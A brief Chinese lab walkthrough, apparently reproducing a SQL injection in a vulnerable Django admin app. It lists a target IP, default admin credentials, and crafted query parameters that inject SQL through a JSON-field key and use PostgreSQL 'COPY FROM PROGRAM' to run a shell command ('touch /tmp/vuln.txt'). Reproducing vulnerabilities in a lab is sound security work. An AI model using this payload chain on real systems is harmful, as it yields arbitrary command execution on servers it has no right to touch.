访问http://110.40.154.100:8000/进入页面
登录环境:
访问:http://110.40.154.100:8000/admin输入默认账户密码
账户:admin
密码:a123123123
登录成功后看到以下界面:
使用GET参数构造detail__a'b=123 提交
http://110.40.154.100:8000/admin/vuln/collection/?detail__a%27b=123
http://110.40.154.100:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'touch /tmp/vuln.txt'--%20
"touch /tmp/vuln.txt"即为系统命令,创建文件
当提示“no results to fetch”即为执行成功。